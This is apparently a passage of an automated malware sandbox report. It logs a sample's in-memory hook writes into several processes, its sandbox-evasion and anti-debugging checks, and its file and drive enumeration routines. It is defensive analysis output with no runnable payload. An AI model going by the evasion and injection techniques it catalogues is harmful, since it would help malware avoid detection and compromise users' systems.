            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 76A81610 value: E9 8B 0D 7D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774D0078 value: E9 53 53 D8 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1448 base: 774EEB2A value: E9 D1 67 D6 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774CFA50 value: E9 3B 69 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774CFDA8 value: E9 93 68 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 757158CD value: E9 2E B7 B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 757182ED value: E9 AE 8D B4 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 7576DF21 value: E9 EA 45 AF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 75709AE0 value: E9 8B 8A B5 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 756F5366 value: E9 55 BE B6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 756F3EFC value: E9 8F D3 B6 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 69CBA9B0 value: E9 3B 6D 5A 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 69CA572C value: E9 AF C0 5B 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 769A6C19 value: E9 32 06 8C 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 769A4889 value: E9 82 D4 8B 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A91D20 value: E9 7B 03 7D 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A0BF10 value: E9 4B 62 85 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 76A81610 value: E9 8B 0D 7E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774D0078 value: E9 53 53 D9 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2228 base: 774EEB2A value: E9 D1 67 D7 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774CFA50 value: E9 3B 69 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774CFDA8 value: E9 93 68 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 757158CD value: E9 2E B7 CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 757182ED value: E9 AE 8D CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 7576DF21 value: E9 EA 45 C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 75709AE0 value: E9 8B 8A CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 756F5366 value: E9 55 BE CF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 756F3EFC value: E9 8F D3 CF 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 69CBA9B0 value: E9 3B 6D 73 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 69CA572C value: E9 AF C0 74 96
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 769A6C19 value: E9 32 06 A5 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 769A4889 value: E9 82 D4 A4 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A91D20 value: E9 7B 03 96 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A0BF10 value: E9 4B 62 9E 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 76A81610 value: E9 8B 0D 97 89
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774D0078 value: E9 53 53 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1260 base: 774EEB2A value: E9 D1 67 F0 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 774CFA50 value: E9 3B 69 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 774CFDA8 value: E9 93 68 F2 88
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 757158CD value: E9 2E B7 CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 757182ED value: E9 AE 8D CD 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 7576DF21 value: E9 EA 45 C8 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 75709AE0 value: E9 8B 8A CE 8A
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1852 base: 756F5366 value: E9 55 BE CF 8A
            Source: C:\Users\user\Desktop\25F.tmp.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\25F.tmp.exe Evasive API call chain: CreateMutex, DecisionNodes, Sleep graph_4-10911
            Source: C:\Users\user\Desktop\25F.tmp.exe Evasive API call chain: NtQuerySystemInformation, DecisionNodes, ExitProcess graph_4-10572
            Source: C:\Users\user\Desktop\25F.tmp.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_4-10462
            Source: C:\Users\user\Desktop\25F.tmp.exe API coverage: 3.6 %
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe API coverage: 1.6 %
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 680 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\25F.tmp.exe Code function: 0_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exe Code function: 2_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 2_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exe Code function: 4_2_0036F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 4_2_0036F130
            Source: C:\Users\user\Desktop\25F.tmp.exe Code function: 4_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 4_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 9_2_003DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 9_2_003DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 10_2_0018F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 10_2_0018F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 11_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 11_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 12_2_0041F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 12_2_0041F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 13_2_001BF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 13_2_001BF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 14_2_0035F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 14_2_0035F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 15_2_0031F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 15_2_0031F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 16_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 16_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 17_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 17_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 18_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 18_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 19_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 19_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 20_2_0032F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 20_2_0032F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe Code function: 21_2_0051F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, 21_2_0051F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_0019F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,22_2_0019F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_0084F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,23_2_0084F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,25_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_0082F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,26_2_0082F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,27_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,29_2_005DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,30_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_0091F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,31_2_0091F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_0039F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,32_2_0039F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,33_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,34_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_0015F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,35_2_0015F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,36_2_007FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_0025F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,37_2_0025F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_0026F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,38_2_0026F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,39_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,40_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_0028F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,41_2_0028F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,42_2_0010F130
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036F9E0 memset,GetLogicalDriveStringsA,lstrcatA,lstrcatA,4_2_0036F9E0
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_0-5164
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-6620
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-6167
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10263
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10254
            Source: C:\Users\user\Desktop\25F.tmp.exeAPI call chain: ExitProcess graph end nodegraph_4-10259
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Users\user\Desktop\25F.tmp.exe  Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep  graph_4-10955
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 4_2_00365A20 LdrEnumerateLoadedModules,CloseHandle,CreateThread,CloseHandle,CreateThread,CloseHandle,  4_2_00365A20
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 2_2_0040399B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,  2_2_0040399B
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 0_2_00608A6C mov eax, dword ptr fs:[00000030h]  0_2_00608A6C
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 0_2_00608A40 mov eax, dword ptr fs:[00000030h]  0_2_00608A40
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 0_2_00608A50 mov eax, dword ptr fs:[00000030h]  0_2_00608A50
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 2_2_00608A6C mov eax, dword ptr fs:[00000030h]  2_2_00608A6C
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 2_2_00608A40 mov eax, dword ptr fs:[00000030h]  2_2_00608A40
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 2_2_00608A50 mov eax, dword ptr fs:[00000030h]  2_2_00608A50
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 2_2_004015A0 movd mm0, dword ptr fs:[00000030h]  2_2_004015A0
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 4_2_003635B0 mov eax, dword ptr fs:[00000030h]  4_2_003635B0
            Source: C:\Users\user\Desktop\25F.tmp.exe  Code function: 4_2_004035B0 mov eax, dword ptr fs:[00000030h]  4_2_004035B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 9_2_003D35B0 mov eax, dword ptr fs:[00000030h]  9_2_003D35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 10_2_001835B0 mov eax, dword ptr fs:[00000030h]  10_2_001835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 11_2_003835B0 mov eax, dword ptr fs:[00000030h]  11_2_003835B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 12_2_004135B0 mov eax, dword ptr fs:[00000030h]  12_2_004135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 13_2_001B35B0 mov eax, dword ptr fs:[00000030h]  13_2_001B35B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 14_2_003535B0 mov eax, dword ptr fs:[00000030h]  14_2_003535B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 15_2_003135B0 mov eax, dword ptr fs:[00000030h]  15_2_003135B0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe  Code function: 16_2_003835B0 mov eax, dword ptr fs:[00000030h]  16_2_003835B0
